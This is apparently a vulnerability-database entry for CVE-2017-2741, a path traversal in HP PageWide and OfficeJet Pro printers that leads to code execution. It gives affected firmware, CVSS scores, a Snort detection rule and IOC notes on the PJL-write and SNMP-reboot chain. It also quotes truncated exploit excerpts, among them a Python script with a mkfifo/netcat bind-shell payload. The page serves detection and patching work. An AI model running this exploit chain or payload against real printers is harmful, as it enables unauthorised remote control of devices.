CVE-2017-2741
Published 2018-01-23
Priority P279 · critical · 9.8 (CVSS 3.0) · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: EPSS 84.89% (99.7th percentile)
A potential security vulnerability has been identified with HP PageWide Printers, HP OfficeJet Pro Printers, with firmware before 1708D. This vulnerability could potentially be exploited to execute arbitrary code.
Affected
38 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | d3q15a_firmware | < 1708d | 1708d |
| hp | d3q15b_firmware | < 1708d | 1708d |
| hp | d3q15d_firmware | < 1708d | 1708d |
| hp | d3q16a_firmware | < 1708d | 1708d |
| hp | d3q16b_firmware | < 1708d | 1708d |
| hp | d3q16c_firmware | < 1708d | 1708d |
| hp | d3q16d_firmware | < 1708d | 1708d |
| hp | d3q17a_firmware | < 1708d | 1708d |
| hp | d3q17c_firmware | < 1708d | 1708d |
| hp | d3q17d_firmware | < 1708d | 1708d |
| hp | d3q19a_firmware | < 1708d | 1708d |
| hp | d3q19d_firmware | < 1708d | 1708d |
| hp | d3q20a_firmware | < 1708d | 1708d |
| hp | d3q20b_firmware | < 1708d | 1708d |
| hp | d3q20c_firmware | < 1708d | 1708d |
| hp | d3q20d_firmware | < 1708d | 1708d |
| hp | d3q21a_firmware | < 1708d | 1708d |
| hp | d3q21c_firmware | < 1708d | 1708d |
| hp | d3q21d_firmware | < 1708d | 1708d |
| hp | d9l20a_firmware | < 1708d | 1708d |
| hp | d9l21a_firmware | < 1708d | 1708d |
| hp | d9l63a_firmware | < 1708d | 1708d |
| hp | d9l64a_firmware | < 1708d | 1708d |
| hp | j3p68a_firmware | < 1708d | 1708d |
| hp | j6u55a_firmware | < 1708d | 1708d |
Detection & IOCs (extracted from sources)

Snort rule:

```snort
alert tcp any any -> $HOME_NET 9100 (msg:"ET EXPLOIT HP Printer Attempted Path Traversal via PJL"; flow:established,to_server; content:"@PJL FS"; depth:7; content:"NAME="; distance:0; pcre:"/^\s*[\x22\x27][^\x22\x27]{0,128}\x2e\x2e/Ri"; reference:url,www.tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution; reference:cve,2017-2741; classtype:attempted-admin; sid:2024404; rev:5; metadata:created_at 2017_06_16, cve CVE_2017_2741, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_11_26, mitre_tactic_id TA0007, mitre_tactic_name Discovery, mitre_technique_id T1083, mitre_technique_name File_And_Directory_Discovery; target:dest_ip;)
```

- Detect PJL path traversal attempts by matching '@PJL FS' followed by 'NAME=' containing '..' sequences on port 9100 (JetDirect/PJL port).
- The exploit writes a shell script to /etc/profile.d/ via PJL FSDOWNLOAD using a path traversal string '0:/../../rw/var/etc/profile.d/' to achieve persistence on reboot.
- After writing the payload, the attacker triggers a printer reboot via SNMP SET on OID 1.3.6.1.2.1.43.5.1.1.3.1 (prtGeneralReset) with value 4 (powerCycleReset). Monitor SNMP SET requests to this OID.
- A successful exploit may leave an unauthenticated telnetd service running as a side effect; monitor for unexpected telnetd processes or open telnet ports on printer devices.
- The default Metasploit payload for this exploit is 'cmd/unix/bind_busybox_telnetd', which binds a telnetd listener on the printer. Hunt for unexpected inbound connections to printer IPs post-reboot.
- The Metasploit module drops a randomly named .sh script (8 random alpha chars) into /etc/profile.d/ and removes it after execution; look for transient .sh files in /etc/profile.d/ on HP printer filesystems.
- The SNMP community string used in the PoC is 'public' (default). Printers with non-default SNMP community strings will not be restartable via this method, potentially stalling the exploit at the reboot step.
- The Metasploit module uses a WfsDelay of 180 seconds to wait for the printer to reboot and execute the payload; detection/response windows should account for this delay between exploit delivery and callback.
- The exploit requires the PJL port (default 9100) to be reachable and SNMP (default UDP 161) to be accessible from the attacker; network segmentation of printer management ports mitigates exposure.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
Suricata

ET EXPLOIT HP Printer Attempted Path Traversal via PJL (suricata · 2017-06-16), CVE-2017-2741. The indexed rule is the Emerging Threats signature sid:2024404 quoted in full under Detection & IOCs above.
Exploit-DB

HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit) (exploitdb · 2018-08-27), CVE-2017-2741

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "rex/proto/pjl"
# Excerpt as indexed: the text between the class name and the module name
# string (the superclass and the opening of the info hash) was lost in
# extraction, and the excerpt is cut off mid-list below.
class MetasploitModule 'HP Jetdirect Path Traversal Arbitrary Code Execution',
  'Description' => %q{
    The module exploits a path traversal via Jetdirect to gain arbitrary code execution by
    writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer
    is restarted using SNMP. Impacted printers:
      HP PageWide Managed MFP P57750dw
      HP PageWide Managed P55250dw
      HP PageWide Pro MFP 577z
      HP PageWide Pro 552dw
      HP PageWide Pro MFP 577dw
      HP PageWide Pro MFP 477dw
      HP PageWide Pro 452dw
      HP PageWide Pro MFP 477dn
      HP PageWide Pro 452dn
      HP PageWide MF
```
Exploit-DB

HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution (exploitdb · 2017-06-14), CVE-2017-2741

```python
##
# Create a bind shell on an unpatched OfficeJet 8210
# Write a script to profile.d and reboot the device. When it comes
# back online then nc to port 1270.
#
# easysnmp instructions:
# sudo apt-get install libsnmp-dev
# pip install easysnmp
##
# Excerpt as indexed (Python 2); the script is cut off below.
import socket
import sys
from easysnmp import snmp_set

profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
                    '\tmkfifo /tmp/pwned\n'
                    '\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n'
                    'fi\n')

if len(sys.argv) != 3:
    print '\nUsage:upload.py [ip] [port]\n'
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' %
```
Metasploit

HP Jetdirect Path Traversal Arbitrary Code Execution (metasploit), CVE-2017-2741

The module exploits a path traversal via Jetdirect to gain arbitrary code execution by writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer is restarted using SNMP. Impacted printers:

- HP PageWide Managed MFP P57750dw
- HP PageWide Managed P55250dw
- HP PageWide Pro MFP 577z
- HP PageWide Pro 552dw
- HP PageWide Pro MFP 577dw
- HP PageWide Pro MFP 477dw
- HP PageWide Pro 452dw
- HP PageWide Pro MFP 477dn
- HP PageWide Pro 452dn
- HP PageWide MFP 377dw
- HP PageWide 352dw
- HP OfficeJet Pro 8730 All-in-One Printer
- HP OfficeJet Pro 8740 All-in-One Printer
- HP OfficeJet Pro 8210 Printer
- HP OfficeJet Pro 8216 Printer
- HP OfficeJet Pro 8218 Printer

Please read the module documentation regarding the possibility for leaving an unauthen
No writeups or analysis indexed.